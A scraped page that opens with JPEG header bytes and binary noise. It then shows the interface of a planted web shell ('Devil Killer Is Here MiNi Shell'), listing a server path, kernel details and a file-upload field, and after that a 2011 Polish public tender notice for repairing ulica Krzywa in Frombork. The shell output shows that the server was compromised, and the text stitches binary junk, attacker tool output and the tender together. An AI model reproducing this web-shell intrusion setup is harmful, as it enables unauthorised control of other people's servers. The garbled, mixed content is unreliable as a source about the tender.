JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110412/113377-N-2011.html

<p class="kh_header"><b>Frombork: Wykonanie prac remontowych na ulicy Krzywej we Fromborku</b><br>
<b>Numer ogłoszenia: 113377 - 2011; data zamieszczenia: 12.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy , ul. Młynarska 5 A, 14-530 Frombork, woj. warmińsko-mazurskie, tel. 0-55 2440660, faks 0-55 2440661.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.frombork.samorzady.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie prac remontowych na ulicy Krzywej we Fromborku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> . wykonanie podbudowy z kruszywa łamanego stabilizowanego mechanicznie 
. wykonanie wzmocnienia gruntów słabonośnych G3 
. wykonanie warstwy wiążącej i ścieralnej z betonu asfaltowego 
. wykonanie zjazdów i chodników z kostki betonowej 
. ustawienie krawężników i obrzeży betonowych 
. regulacja pionowa urządzeń znajdujących się w jezdni i chodniku 
. poprawienie odwodnienia 
. urządzenia bezpieczeństwa ruchu (oznakowanie pionowe i poziome , próg zwalniający itp.) 
5. Stan projektowany ( przebieg trasy ) 
A. Projektowana sytuacja 
Projektowane rozwiązanie ulicy Krzywej w planie przedstawiono na planie sytuacyjnym w 
skali1:500. Oś projektowanej ulicy poprowadzona będzie po osi istniejącej. Po obu 
stronach jezdni zlokalizowane będą ciągi piesze .Projektuje się korektę na włączeniu do 
skrzyżowania z ulicą Leśną. Planuje się wykonanie prostopadłego włączenia do tej drogi . 
Przyjęto wyokrąglenia łukami o promieniach : na skrzyżowaniu z ulicą Leśną 6,0 m , z ulicą 
Sadową 6,0m oraz z ulicą Kwiatową 6,0 m. Wszelkie niezbędne dane pokazano na planie 
sytuacyjnym. 

B. Parametry techniczne 
-Klasa techniczna drogi D
-Prędkość projektowa Vp = 30 km/h
-Przekrój poprzeczny
-Szerokość jezdni -6,0 m ( nawierzchnia bitumiczna )
-Obustronne chodniki szerokości 2,0 m
-Kategoria ruchu -ruch KR1
-Obciążenie 80 kN/oś
C. Projektowana niweleta 
Rozwiązanie wysokościowe niwelety na odcinku projektowanym musi uwzględnić poziom 
istniejących wjazdów i dojść do budynków jednorodzinnych oraz sprawne odprowadzenie 
wód opadowych oraz nawiązać się do rzędnych nawierzchni ulicy Leśnej , Sadowej i 
Kwiatowej. Spadki podłużne pokazano na rysunku przekrój podłużny. Niweletę ulicy 
Krzywej zaprojektowano pod kątem optymalizacji kosztów z zachowaniem niezbędnych 
spadków podłużnych umożliwiających odprowadzenie wód opadowych . Na projektowanym 
odcinku dowiązano niweletę jezdni do niwelacji państwowej.

D. Przekrój poprzeczny 
Ulica Krzywa w przekroju poprzecznym będzie posiadała jezdnię o szerokości 6,0 m . 
Pochylenie poprzeczne projektuje się dwustronne o wartości 2 %, tylko na odcinku łuku 
poziomego w km 0 + 200 o R=25,0 m spadek będzie jednostronny 5% i poszerzony każdy 
pas ruchu o 0,5m. Krawężnik betonowy 15 x 30 cm oddzielający jezdnię od chodników 
wystający12 cm , obniżony do wysokości 3 cm na zjazdach. Na zjazdach planuje się 
ułożenie krawężnika przejazdowego 15 x 22 cm od strony ulicy i posesji , natomiast po bokach, na odcinku pomiędzy chodnikiem a posesja ustawienie obrzeSy8 x25 cm 
wtopionych. Obustronne chodniki szerokości 2,0 m bezpośrednio przylegające do jezdni, od 
strony posesji ograniczone obrzeżami betonowymi 8 x 25 cm . Nawierzchnia chodników 
wystająca 1cm ponad krawężniki , natomiast obrzeża w poziomie nawierzchni chodników . 
Spadek poprzeczny chodników 2% w kierunku jezdni.
6. Projektowana konstrukcja nawierzchni 
W oparciu o załącznik nr.5 do rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 
2 marca 1999 r. dotyczący projektowania konstrukcji nawierzchni dróg , przyjęto dla drogi o 
ruchu kategorii KR1nastepujące konstrukcje : 

A. Dla jezdni ulicy Krzywej -odcinek od km 0 + 000 do km 0 + 040 ( grunty G3 ) 
-warstwa ścieralna gr.4cm z betonu asfaltowego 
-warstwa wiążąca gr.4cm z betonu asfaltowego 
-podbudowa pomocnicza gr. 20 cm z kruszywa łamanego stabilizowanego mechanicznie 

Z uwagi na występowanie w podłożu gruntów G3 konieczne jest doprowadzenie ich do G1. 
Projektuje się wzmocnienie gruntu poprzez ułożenie na podłożu o grupie nośności G3 
warstwy grubości 15 cm z gruntów stabilizowanych spoiwem o Rm = 2,5 MPa. Warstwę 
należy ułożyć na całej szerokości pomiędzy krawężnikami. 

B. Dla jezdni ulicy Krzywej -odcinek od km 0 + 040 do km 0 + 373 ( grunty G1 ) 
-warstwa ścieralna gr.4cm z betonu asfaltowego
-warstwa wiążąca gr.4cm z betonu asfaltowego
-podbudowa gr. 20 cm z kruszywa łamanego stabilizowanego mechanicznie.
C. Na ciągach pieszych 
-kostka betonowa grubości 6 cm na podsypce cementowo - piaskowej
-warstwa odcinająca grubości 10cm z piasku

D. Na zjazdach 
-kostka betonowa gr. 8 cm na podsypce cementowo - piaskowej
-podbudowa zasadnicza gr. 10 cm z chudego betonu
-warstwa odcinająca grubości 10cm z piasku

7.Roboty ziemne 
Zasadnicze roboty ziemne związane są z wykonaniem nowej konstrukcji jezdni na ulicy 
Krzywej oraz chodników i zjazdów. Bilans robót ziemnych przedstawiono w załącznikach 
do przedmiaru robót . Roboty ziemne w wykopie należy prowadzić pod nadzorem 
użytkowników urządzeń podziemnych . 

8.Odwodnienie 
Zaprojektowano odwodnienie powierzchniowe jezdni ulic poprzez nadanie im odpowiednich 
spadków podłużnych i porzecznych z odprowadzeniem wód opadowych do wpustów 
podłączonych do istniejącej kanalizacji deszczowej. Dokładną lokalizację i rzędne wpustów 
ulicznych pokazano na rysunku plan sytuacyjny.
  9.Urządzenia obce 
Przeprowadzono uzgodnienia z administratorami urządzeń obcych . Przed 
przystąpieniem do robót należy zapoznać się z treścią i warunkami uzgodnień i 
bezwzględnie ich przestrzegać. Nie wyklucza się istnienia w terenie nie wskazanych 
na mapie urządzeń podziemnych nie zgłoszonych do inwentaryzacji lub o których brak 
jest danych. Należy szczególną ostrożność zachować przy robotach ziemnych, 
zwłaszcza wykopach. W przypadku natrafienia na takie urządzenie w obrębie robót , 
po rozpoznaniu, należy zwrócić się do właściciela urządzenia o uzgodnienie.
10.Ochrona środowiska 
Z uwagi na charakter prac przewidzianych do wykonania na planowanym zadaniu nie 
zachodzi konieczność dokonania badań i ocen związanych z oddziaływaniem drogi na 
środowisko . Na ulicy Krzywej dzięki wykonaniu nowej nawierzchni z betonu asfaltowego 
poprawi się komfort jazdy, co pociągnie za sobą zmniejszenie w otoczeniu drogi poziomu 
hałasu i wibracji . Nowa nawierzchnia jezdni , zjazdów i chodników poprawi estetykę ulicy . 
Podniesienie płynności ruchu pojazdów wpłynie na zmniejszenie stężenia substancji 
zanieczyszczających emitowanych przez pojazdy poruszające się na drodze. Nawierzchnia 
bitumiczna wyeliminuje zapylenie powstające obecnie przy ruchu pojazdów po nawierzchni 
żwirowej w okresie letnim . Uszczelnienie nawierzchni zapobiegnie przenikaniu wód 
opadowych z jezdni bezpośrednio do gruntu, a wody zostaną odprowadzone za 
pośrednictwem wpustów do istniejącej kanalizacji deszczowej. 

11.Zjazdy 
Rozwiązanie zjazdów przyjęto typowe . Szerokość zjazdu wynosić będzie 3,5m , a 
podłączenie do jezdni wyłagodzone skosami 1: 1 .Lokalizację zjazdów przedstawiono 
na planie sytuacyjnym.
12. Organizacja ruchu. 
Ulica Krzywa nie posiada właściwego oznakowania. Po remoncie ulicy konieczne jest 
ustawienie pełnego oznakowania pionowego oraz wykonanie poziomego. Przed wjazdem na 
ulicę Leśną ( w km 0 +020) i Kwiatową ( w km 0+353) należy na ulicy Krzywej ustawić znak 
A-7 ( ustąp pierwszeństwa).Przed wyjazdem z ulicy Sadowej na ulicę Krzywą należy również
ustawić znak A-7 ( ustąp pierwszeństwa km 0+020). Z uwagi na planowane przejścia dla 
pieszych konieczne są znaki D-6 ( w km 0+012,5 , km 0+017,5 , km 0+361,5, km0+366,5) 
a przed progiem zwalniającym ustawić należy słupki ( w km 0+036 i km 0+076) ze znakami 
A-11a z tabliczką T-1 ( 20 m ) oraz ze znakami B-33 ( 20 ). Miejsce ustawienia znaków 
przedstawiono na planie sytuacyjnym. Oprócz znaków pionowych D-6 i A-11a , konieczne 
jest wykonanie oznakowania poziomego P-10 i P-25. Oznakowanie należy wykonać 
zgodnie z instrukcja o znakach drogowych. Planuje się ustawienie stalowej poręczy 
ochronnej U-11 przy ul. Krzywej na wysokości ciągu pieszego z ul. Kolonia Robotnicza 
( od km 0+103 do km 0+107. Próg zwalniający U-16c o wymiarach 1,0m+2,5m+1,0m i 
wysokości10cm będzie usytuowany w km 0+056 . Projekt tymczasowej 
organizacji ruchu na czas prowadzenia robót przedstawi wyłoniony wykonawca robót.
 
12. Szczegółowy opis przedmiotu zamówienia zawierają:
- dokumentacja projektowa,
- specyfikacja techniczna wykonania i odbioru robót budowlanych, udostępnione przez zamawiającego w ramach postępowania o udzielenie zamówienia (siwz).
13. Strony ustalają, że Wykonawca wykona przedmiot umowy zgodnie z obowiązującymi przepisami prawa budowlanego oraz obowiązującymi Polskimi Normami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.23.00.00-8, 45.23.30.00-9, 45.23.32.80-5, 45.23.30.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium. 
2.Wysokość wadium ustala się w kwocie 10 000,00 PLN słownie: dziesięć tysiąc   00100 PLN.
3.Wadium musi obejmować okres związania ofertą. 
4.Wadium może być wnoszone w jednej lub kilku następujących formach:
1)pieniądzu - przelewem na rachunek bankowy Zamawiającego Nr 59 8313 0009 0060 0170 2000 0040, z dopiskiem wadium na wykonanie  dokumentacji projektowo kosztorysowej przebudowy ulicy Osiedle Słoneczne z dojazdami do budynków ulicami, miejscami postojowymi oraz infrastrukturą techniczną, kanalizacja deszczowa i oświetleniem ulicznym.
2)w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)gwarancjach bankowych,
4)gwarancjach ubezpieczeniowych,
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust, 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
5.Wadium wnoszone w pieniądzu uznaje się za wniesione, jeżeli przed upływem terminu składania ofert znajdować się będzie na koncie Zamawiającego. Kserokopię przelewu, potwierdzoną za zgodność z oryginałem przez Wykonawcę, należy dołączyć do oferty.
6.Wadium wnoszone w innej formie, niż w pieniądzu powinno zawierać bezwzględne i nieodwołalne zobowiązanie podmiotu udzielającego gwarancji do wypłaty kwoty wadium w przypadkach wymienionych w art. 46 ust. 4a i ust. 5 - ustawy Prawo zamówień publicznych. W przypadku gdy oferent wybierze wadium w postaci niepieniężnej, oryginał dokumentu wadium należy złożyć wraz z ofertą w terminie do dnia składania ofert tj. do dnia 29.04.2011 do godziny 11:00.
7.Wykonawca, który nie złoży wadium w wymaganej wysokości lub z przekroczeniem terminu oznaczonego w specyfikacji, albo bez zachowania formy określonej w ust. 4, zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
8.Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem ust. 13 niniejszego rozdziału.
9.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
10.Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
11.Zamawiający żąda ponownego wniesienia wadium przez wykonawców, któremu zwrócono wadium na podstawie ust. 8 niniejszego rozdziału, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza.  Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
12.Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
13.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust 3 ustawy - Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 - ustawy, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
14.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
15.Wykonawca, który nie wniesie wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzi się na przedłużenie okresu związania ofertą, zostanie wykluczony z ubiegania się o udzielenie zamówienia publicznego. 
16.Odmowa wyrażenia zgody na przedłużenie okresu związania ofertą, nie powoduje utraty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunków udziału w postępowaniu należy złożyć następujące     oświadczenie:
Oświadczenie Wykonawcy o spełnieniu warunków art. 22 ust. 1 ustawy- Prawo zamówień publicznych- załącznik Nr 2 do SIWZ
W celu potwierdzenia braku podstaw do wykluczenia z postępowania należy złożyć następujące  oświadczenie:
Oświadczenie Wykonawcy o braku podstaw do wykluczenia art. 24 ust. 1 ustawy - Prawo zamówień publicznych - załącznik Nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku posiadania wiedzy i doświadczenia, Wykonawca złoży:
Wykaz robót, które spełniają warunki określone w §8 do SIWZ  - zgodnie z załącznikiem nr 4 do SIWZ,
Wykaz należy przedstawić zgodnie ze wzorem stanowiącym załącznik nr 4 do SIWZ. Do wykazu należy dołączyć dokumenty (referencje), potwierdzające należyte wykonanie usług wymienionych w wykazie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania     zamówienia, Wykonawca złoży:
1)  Wykaz osób, które spełniają warunki określone w §8 SIWZ - zgodnie z załącznikiem nr 5 do SIWZ,
2) Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia zamówienia, wymagane ustawą Prawo budowlane-  zgodnie z załącznikiem nr 6 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie zamawiający wymaga, aby wykonawca wykazał się wykonaniem minimum jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi w rozumieniu przepisów prawa budowlanego specjalności branża drogowa bez ograniczeń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku dotyczącego sytuacji ekonomicznej i finansowej, Wykonawca złoży:
aktualną polisę a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie  prowadzonej działalności związanej z przedmiotem zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Świadectwo jakości polbruk, świadectwo z badania składu betonu asfaltowego</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
